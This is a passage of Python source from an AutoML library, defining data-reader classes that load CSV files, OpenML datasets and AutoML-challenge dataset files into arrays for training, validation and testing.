def __init__(self, file_name, is_classification=None):
self.file_name = file_name
self.data = None
self.X = None
self.Y = None
self.X_valid = None
self.Y_valid = None
self.X_test = None
self.Y_test = None
self.is_classification = is_classification
self.categorical_features = None
self.is_multilabel = None
self.max_runtime = None
self.metric = None
@abstractmethod
def read(self):
return
def convert(self, **kwargs):
"""
        Convert the data using the DataConverter with its default settings.
        Arguments:
            **kwargs: keyword arguments passed on to the DataConverter.
"""
data_converter = DataConverter(is_classification=self.is_classification, is_multilabel=self.is_multilabel, **kwargs)
self.X, self.Y, self.is_classification, self.is_multilabel, self.categorical_features = data_converter.convert(self.X, self.Y)
if self.X_valid is not None and self.Y_valid is not None:
self.X_valid, self.Y_valid, _, _, _ = data_converter.convert(self.X_valid, self.Y_valid)
if self.X_test is not None and self.Y_test is not None:
self.X_test, self.Y_test, _, _, _ = data_converter.convert(self.X_test, self.Y_test)
class CSVReader(DataReader):
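    """Reader for plain CSV files; the last column of the file is used as the target Y."""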
def __init__(self, file_name, is_classification=None):
self.num_entries = None
self.num_features = None
self.num_classes = None
super(CSVReader, self).__init__(file_name, is_classification)
def read(self, auto_convert=True, **kwargs):
"""
        Read the data from the given CSV file.
Arguments:
auto_convert: Automatically convert data after reading.
            **kwargs: keyword arguments passed on to convert().
"""
self.data = pd.read_csv(self.file_name)
self.num_entries = len(self.data)
self.num_features = len(self.data.iloc[0]) - 1
self.data = np.array(self.data)
        self.X = self.data[0:self.num_entries, 0:self.num_features]
self.Y = self.data[0:self.num_entries, -1]
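        # Replace '?' placeholder entries with NaN so they are handled as missing values.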
for i in range(self.X.shape[0]):
for j in range(self.X.shape[1]):
if self.X[i, j] == "?":
self.X[i, j] = np.nan
self.num_classes = len(np.unique(self.Y))
        if auto_convert:
self.convert(**kwargs)
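# Usage sketch (illustrative; "my_data.csv" is a placeholder path, not part of this module):
#   reader = CSVReader("my_data.csv", is_classification=True)
#   reader.read()                # auto_convert=True also runs the DataConverter
#   X, Y = reader.X, reader.Y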
class OpenMlReader(DataReader):
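    """Reader that downloads a dataset from OpenML by its dataset id using the openml package."""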
def __init__(self, dataset_id, is_classification = None, api_key=None):
import openml
self.openml = openml
self.num_entries = None
self.num_features = None
self.num_classes = None
self.dataset_id = dataset_id
if api_key:
openml.config.server = "https://www.openml.org/api/v1/xml"
openml.config.apikey = api_key
super(OpenMlReader, self).__init__("openml:" + str(dataset_id), is_classification)
def read(self, **kwargs):
"""
        Download and read the dataset with the given OpenML dataset id.
        Arguments:
            **kwargs: accepted for interface compatibility; currently unused.
"""
dataset = self.openml.datasets.get_dataset(self.dataset_id)
try:
self.X, self.Y, self.categorical_features = dataset.get_data(
target=dataset.default_target_attribute, return_categorical_indicator=True)
        except Exception as e:
            raise RuntimeError("An error occurred when loading the dataset and splitting it into X and Y "
                               "(original error: %s). Please check that the dataset is suitable." % e)
self.num_entries = self.X.shape[0]
self.num_features = self.X.shape[1]
self.is_multilabel = False
class_labels = dataset.retrieve_class_labels(target_name=dataset.default_target_attribute)
if class_labels:
self.is_classification = True
self.num_classes = len(class_labels)
else:
self.is_classification = False
self.num_classes = 1
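# Usage sketch (illustrative; dataset id 31 and the API key value are placeholder assumptions):
#   reader = OpenMlReader(31, api_key="YOUR_OPENML_API_KEY")
#   reader.read()
#   print(reader.num_entries, reader.num_features, reader.num_classes)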
class AutoMlReader(DataReader):
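    """Reader for AutoML-challenge-style datasets: a key=value info file plus
    <name>_train/_valid/_test .data and .solution files, dense or sparse."""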
def __init__(self, path_to_info):
self.num_entries = None
self.num_features = None
self.num_classes = None
super(AutoMlReader, self).__init__(path_to_info, None)
def read(self, auto_convert=True, **kwargs):
path_to_info = self.file_name
info_dict = dict()
# read info file
with open(path_to_info, "r") as f:
for line in f:
info_dict[line.split("=")[0].strip()] = line.split("=")[1].strip().strip("'")
self.is_classification = "classification" in info_dict["task"]
name = info_dict["name"]
path = os.path.dirname(path_to_info)
self.is_multilabel = "multilabel" in info_dict["task"] if self.is_classification else None
self.metric = info_dict["metric"]
self.max_runtime = float(info_dict["time_budget"])
target_num = int(info_dict["target_num"])
feat_num = int(info_dict["feat_num"])
train_num = int(info_dict["train_num"])
valid_num = int(info_dict["valid_num"])
test_num = int(info_dict["test_num"])
is_sparse = bool(int(info_dict["is_sparse"]))
feats_binary = info_dict["feat_type"].lower() == "binary"
# read feature types
force_categorical = []
force_numerical = []
if info_dict["feat_type"].lower() == "binary" or info_dict["feat_type"].lower() == "numerical":
force_numerical = [i for i in range(feat_num)]
elif info_dict["feat_type"].lower() == "categorical":
force_categorical = [i for i in range(feat_num)]
elif os.path.exists(os.path.join(path, name + "_feat.type")):
with open(os.path.join(path, name + "_feat.type"), "r") as f:
for i, line in enumerate(f):
if line.strip().lower() == "numerical":
force_numerical.append(i)
elif line.strip().lower() == "categorical":
force_categorical.append(i)
# read data files
reading_function = self.read_datafile if not is_sparse else (
self.read_sparse_datafile if not feats_binary else self.read_binary_sparse_datafile)
self.X = reading_function(os.path.join(path, name + "_train.data"), (train_num, feat_num))
self.Y = self.read_datafile(os.path.join(path, name + "_train.solution"), (train_num, target_num))
if os.path.exists(os.path.join(path, name + "_valid.data")) and \
os.path.exists(os.path.join(path, name + "_valid.solution")):
self.X_valid = reading_function(os.path.join(path, name + "_valid.data"), (valid_num, feat_num))
self.Y_valid = self.read_datafile(os.path.join(path, name + "_valid.solution"), (valid_num, target_num))
if os.path.exists(os.path.join(path, name + "_test.data")) and \
os.path.exists(os.path.join(path, name + "_test.solution")):
self.X_test = reading_function(os.path.join(path, name + "_test.data"), (test_num, feat_num))
self.Y_test = self.read_datafile(os.path.join(path, name + "_test.solution"), (test_num, target_num))
if not self.is_multilabel and self.is_classification and self.Y.shape[1] > 1:
self.Y = np.argmax(self.Y, axis=1)
self.Y_valid = np.argmax(self.Y_valid, axis=1) if self.Y_valid is not None else None
self.Y_test = np.argmax(self.Y_test, axis=1) if self.Y_test is not None else None
if auto_convert and not is_sparse:
self.convert(force_categorical=force_categorical, force_numerical=force_numerical, **kwargs)
def read_datafile(self, filepath, shape):
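        """Read a dense, whitespace-separated data file into a numpy array.
        The shape argument is currently unused and kept only for a uniform interface
        with the sparse readers."""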
data = []
with open(filepath, "r") as f:
for line in f:
data.append([float(v.strip()) for v in line.split()])
return np.array(data)
def read_sparse_datafile(self, filepath, shape):
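        """Read a sparse data file with 'column:value' entries (1-based column indices)
        into a scipy.sparse CSR matrix of the given shape."""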
data = []
row_indizes = []
col_indizes = []
with open(filepath, "r") as f:
for row, line in enumerate(f):
print("\rReading line:", row, "of", shape[0], end="")
for value in line.split():
value = value.rstrip()
data.append(float(value.split(":")[1]))
col_indizes.append(int(value.split(":")[0]) - 1)
row_indizes.append(row)
print("Done")
return csr_matrix((data, (row_indizes, col_indizes)), shape=shape)
def read_binary_sparse_datafile(self, filepath, shape):
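        """Read a binary sparse data file where each line lists the 1-based indices of the
        columns that are set to 1; returns a scipy.sparse CSR matrix of the given shape."""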
row_indizes = []
col_indizes = []
with open(filepath, "r") as f:
for row, line in enumerate(f):
print("\rReading line:", row, "of", shape[0], end="")
for value in line.split():
value = value.rstrip()
col_indizes.append(int(value) - 1)
row_indizes.append(row)
print("Done")
return csr_matrix(([1] * len(row_indizes), (row_indizes, col_indizes)), shape=shape)
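# Usage sketch (illustrative; the info-file path is an assumption following the AutoML
# challenge layout, e.g. <dataset_dir>/<name>_public.info next to <name>_train.data):
#   reader = AutoMlReader("datasets/adult/adult_public.info")
#   reader.read()
#   X_train, Y_train = reader.X, reader.Y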
| 41.294872
| 148
| 0.608093
|